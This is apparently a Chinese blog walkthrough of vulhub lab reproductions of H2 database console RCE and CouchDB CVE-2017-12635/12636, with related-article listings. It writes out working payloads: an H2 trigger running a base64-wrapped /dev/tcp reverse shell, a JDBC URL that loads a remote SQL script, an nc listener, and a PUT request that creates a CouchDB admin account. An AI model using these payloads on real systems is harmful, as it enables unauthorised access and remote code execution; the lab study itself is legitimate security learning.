vulhub-Couchdb+H2database漏洞复现(简单好上手)

最新推荐文章于 2024-04-25 14:19:44 发布
最新推荐文章于 2024-04-25 14:19:44 发布
阅读量243 收藏
点赞数
文章标签: couchdb
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_68064663/article/details/134417208
版权

#数据库应用-H2database- -未授权访问&CVE漏洞

默认端口:20051

Java SQL 数据库 H2,H2的主要特点是:非常快,开源,JDBC API;嵌入式和服务器模式;内存数据库;基于浏览器的控制台应用程序。H2 数据库控制台中的另一个未经身份验证的 RCE 漏洞,在v2.1.210+中修复。2.1.210 之前的H2控制台允许远程攻击者通过包含子字符串的jdbc:h2:mem JDBC URL执行任意代码。

数据库识别:

复现:

1、生成远程调用链接

链接填进去:

上面写:javax.naming.InitialContext

但是这边没有反应:

2、未授权进入:

jdbc:h2:mem:test1;FORBID_CREATION=FALSE;IGNORE_UNKNOWN_SETTINGS=TRUE;FORBID_CREATION=FALSE;\

进去了

3、RCE执行反弹:

在攻击机上:

1.创建数据库文件:fuckh2db.sql

文件内容:

CREATE TABLE test (

     id INT NOT NULL

 );

CREATE TRIGGER TRIG_JS BEFORE INSERT ON TEST AS '//javascript

Java.type("java.lang.Runtime").getRuntime().exec("bash -c {echo,base64加密的反弹shell指令}|{base64,-d}|{bash,-i}");';

#反弹shell指令示例:bash -i >& /dev/tcp/x.x.x.x/6666 0>&1

x.x.x.x换成自己攻击机(接收shell的服务器)IP

base64加密的反弹shell指令:

2.启动提供SQL文件远程加载服务

python3 -m http.server 端口

自己电脑访问sql文件

默认下载

攻击机上显示资源别访问过:

-填入Payload使其加载远程SQL

jdbc:h2:mem:test1;FORBID_CREATION=FALSE;IGNORE_UNKNOWN_SETTINGS=TRUE;FORBID_CREATION=FALSE;INIT=RUNSCRIPT FROM 'http://搭建的IP:端口/h2database.sql';\

写到下面的框里面:

nc -lvvp xxxx

#数据库应用-Couchdb-未授权越权&CVE漏洞

默认端口:5984

-Couchdb 垂直权限绕过(CVE-2017-12635

Apache CouchDB是一个开源数据库,专注于易用性和成为"完全拥抱web的数据库"。它是一个使用JSON作为存储格式,JavaScript作为查询语言,MapReduce和HTTP作为API的NoSQL数据库。应用广泛,如BBC用在其动态内容展示平台,Credit Suisse用在其内部的商品部门的市场框架,Meebo,用在其社交平台(web和应用程序)。在20171115日,CVE-2017-12635和CVE-2017-12636披露利用。

用PUT请求:

1、先创建用户(bp发包)

PUT /_users/org.couchdb.user:xtang HTTP/1.1

Host: 47.94.236.117:44389

Accept: */*

Accept-Language: en

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)

Connection: close

Content-Type: application/json

Content-Length: 108

{

  "type": "user",

  "name": "xtang",

  "roles": ["_admin"],

  "roles": [],

  "password": "xtang"

}

2、登录用户授权

Get:http://39.101.70.82:5984/_utils/

xtang xtang

复现:

我这里使用postman发包,发送put数据包:

访问:http://39.101.70.82:5984/_utils/

输入账号密码:xtang xtang

成功登录

-Couchdb 命令执行 (CVE-2017-12636)

1、下载exp.py

2、修改目标和反弹地址

3、Python3调用执行即可

https://github.com/vulhub/vulhub/blob/master/couchdb/CVE-2017-12636/exp.py

代码改两个地方:

这里我用的同一个机子

监听到了:

似锦c
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
H2 Database简介
wunianisme的博客
07-29 1万+
H2 Database是什么? H2 Database是一个开源的嵌入式数据库引擎,采用java语言编写,不受平台的限制,同时H2 Database提供了一个十分方便的web控制台用于操作和管理数据库内容。H2 Database还提供兼容模式,可以兼容一些主流的数据库,因此采用H2 Database作为开发期的数据库非常方便。 H2 Database的作用 1.H2 Database最大的用途在于...
H2 Database:轻量级、快速且可靠的内存数据库解决方案
里查叔叔
03-21 1368
首先,您需要访问 H2 Database 的官方网站(https://www.h2database.com/),并下载最新的 H2 数据库版本。通过遵循上述步骤并参考官方文档和社区资源,您将能够快速搭建起一个高效、可靠的 H2 数据库环境,并在各种应用场景中充分利用其强大的功能和灵活性。您只需将解压后的文件放置在一个合适的目录中,并确保该目录被添加到系统的 PATH 环境变量中,以便在命令行中轻松访问 H2 数据库的可执行文件。此外,H2 Database 还提供了丰富的功能和选项来满足不同场景下的需求。
windows10 H2database 安装教程
最新发布
weixin_54136520的博客
04-25 447
JDBC URL中的~/test为相对地址,可以单独创建一个DB文件夹存放数据库文件,可以使用绝对地址,比如D:\Program Files (x86)\H2\dbdata\testdb。右击小图标选择”Create a new database…安装完后默认启动,如退出后需手动启动则在安装目录下启动。启动完,在桌面右下角会出小图标。
h2database的集成和使用
haiyangyiba的专栏
03-31 1084
记得在学习研究Spring Session JDBC部分的知识时,从官网的示例中看到了引用了com.h2database坐标,当时的主要目的在于Spring Session JDBC部分,只是略微的注意到了有个在线操作数据库的组件,当时也只是在线登录访问了一下而已。本次则是浅浅的来整合一下该组件,更多可转至个人博客站内。
服务攻防-数据库安全-Influxdb&H2database&CouchDB&ElasticSearch数据库漏洞
ran的博客
05-07 2340
默认端口:InfluxDB 是一个开源的时间序列数据库,旨在处理大规模数据处理和分析的高写入和查询负载。它针对实时存储和查询大量时间戳数据进行了优化。InfluxDB 提供了一种类似 SQL 的查询语言称为 InfluxQL,允许用户从数据库中检索和操作数据。它还支持各种客户端库和插件,以与其他数据源和工具集成。InfluxDB 的一些主要特点包括:高写入和查询性能:InfluxDB 优化了高吞吐量数据摄取和检索,非常适合实时数据处理和分析。
漏洞分析|Metabase 代码执行漏洞(CVE-2023-38646):H2 JDBC 深入利用
m0_46699477的博客
07-28 1835
利用 TRIGGER + DefineClass 完整的实了 JAVA 代码执行和漏洞回显。
Kitura-CouchDB:用于Kitura的CouchDB适配器
02-03
Kitura-CouchDB是专为Kitura框架设计的一个CouchDB适配器,它使得在Swift后端开发中集成CouchDB数据库变得简单易行。Kitura是一个强大的、开源的服务器端Swift框架,用于构建可扩展和安全的网络应用程序。而CouchDB...
guile-couchdb:指导方案的Couchdb
02-04
2. 创建数据库:使用`create-database`函数创建一个新的数据库,如`create-database '("mydb")`。 3. 存储文档:将Scheme对象转换为JSON,然后使用`put-document`函数存入数据库,如`(put-document db doc-id json-...
excel-couchdb-import:将Excel工作表导入到CouchDBPouchDB
05-17
excel-couchdb导入 将Excel表格导入到CouchDB excel-couchdb-import Excel文件(* .xls,*。xslx)导入CouchDB / PouchDB文档,并将工作表转换为JSON。 用法 文档更新冲突是可能的,将被忽略。 excel-couchdb-...
fastify-couchdb:固定CouchDB连接插件
04-29
fastify-couchdb 固定CouchDB连接插件,使用它可以在服务器的每个部分共享相同的CouchDB连接。 在后台使用了流行的模块,将您传递给register的选项传递给了nano实例。 安装 npm i fastify-couchdb --save 用法 只...
bitnami-docker-couchdb:用于CouchDB的Bitnami Docker映像
02-19
什么是CouchDB? CouchDB是一个开放源代码NoSQL数据库,用于存储带有JSON文档的数据,您可以通过HTTP访问该文档。 它允许您使用JavaScript索引,合并和转换文档。TL; DR $ docker run --name couchdb bitnami/...
H2 DataBase入门
凌康的博客
12-01 1426
H2 DataBase入门+整合hibernate+整合mybatis+整合springboot H2 是一个用 Java 编写的可嵌入的关系型数据库,H2的主要特点是: 非常快,开源,JDBC API 嵌入式和服务器模式;内存数据库 基于浏览器的控制台应用程序 占用空间小:大约 2.5 MB jar 文件大小 H2数据库可以安装服务server到本机,也可以不安装,执行jdbc连接时根据url的路径自动创建db文件。可以在开发中小型应用时免去安装mysql等,也可以用于javafx客户端应用的开发和安
H2_Database 概述、下载与安装、及使用入门
蚩尤后裔-汪茂雄
02-27 5324
目录 H2 Database 概述 Connection Modes(连接模式) 下载与安装 H2 Database 使用入门 创建H2数据库 连接H2数据库 操作H2数据库 修改 H2 默认端口 Database URL Overview H2 Database 概述 1、H2 是一个开源的嵌入式数据库引擎,纯 java 实的关系型数据库,不受平台的限制。 2、H...
SpringBoot集成H2 DataBase
tiantiantbtb的博客
03-23 356
然而,H2 Database 可以与 Spring 框架一起使用,Spring 框架提供了 H2 Database 的集成支持,这使得在 Spring 应用程序中使用 H2 Database 变得更加方便。Web应用程序:H2 Database可以被用作Web应用程序的后端数据库,特别是在需要使用Java语言编写的Web应用程序中,因为它可以与Java应用程序无缝集成。H2 Database 是一款轻量级的嵌入式关系型数据库,H2database既可以作为内存型数据库,也可以作为关系型硬盘数据库使用。
H2数据库配置及相关使用方式一站式介绍(极为详细并整理官方文档)
轨迹的博客
02-20 8140
由于国内H2嵌入式数据库并不是主流数据库,因此相关生态资源文件都比较少,并且很多都是断断续续的,针对此类问题笔者特意去官网整理相关配置文件及说明并进行梳理,方便大家开发时使用。 H2数据库配置及相关使用方式一站式介绍(极为详细并整理官方文档)
H2内存数据库
weixin_38214514的博客
03-06 1230
H2 数据库是一个用 Java 开发的嵌入式(内存级别)数据库,它本身只是一个类库,也就是只有一个 jar 文件,可以直接嵌入到项目中。
h2database BTree 设计实与查询优化思考
原来是这样啊
10-12 188
查询优化实质上就是访问数据量的优化,磁盘IO 的优化。如果数据全部缓存到内存中,实际上就是计算量的优化,CPU 使用的优化。索引是有序的,实际上就是指块文件内的 offsets 是以数组形式体的。特殊的是,在h2database 中,offsets数组元素也是有序的(例如:[4090, 4084, 4078, 4072, 4066, 4060, 4054, 4048, 4042]),应该是方便磁盘顺序读,防止磁盘碎片化。
数据库应用-H2database--未授权访问&命令执行漏洞
XXokok的博客
11-26 457
数据库应用-H2database--未授权访问&命令执行漏洞
H2 Database Console 未授权访问
锋刃科技的博客
01-22 2254
漏洞概述 H2 database是一款Java内存数据库,多用于单元测试。H2 database自带一个Web管理页面,在Spirng开发中,如果我们设置如下选项,即可允许外部用户访问Web管理页面,且没有鉴权: spring.h2.console.enabled=true spring.h2.console.settings.web-allow-others=true 利用这个管理页面,我们可以进行JNDI注入攻击,进而在目标环境下执行任意命令。 环境搭建 使用vulhub来安装...
hyperledger fabric+express+couchdb+ReactJS
08-29
您提到了几个不同的技术和框架:Hyperledger Fabric、Express、CouchDB和ReactJS。这些技术和框架被广泛用于构建区块链应用程序和Web应用程序。 Hyperledger Fabric是一个开源的企业级区块链平台,它提供了一个可...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值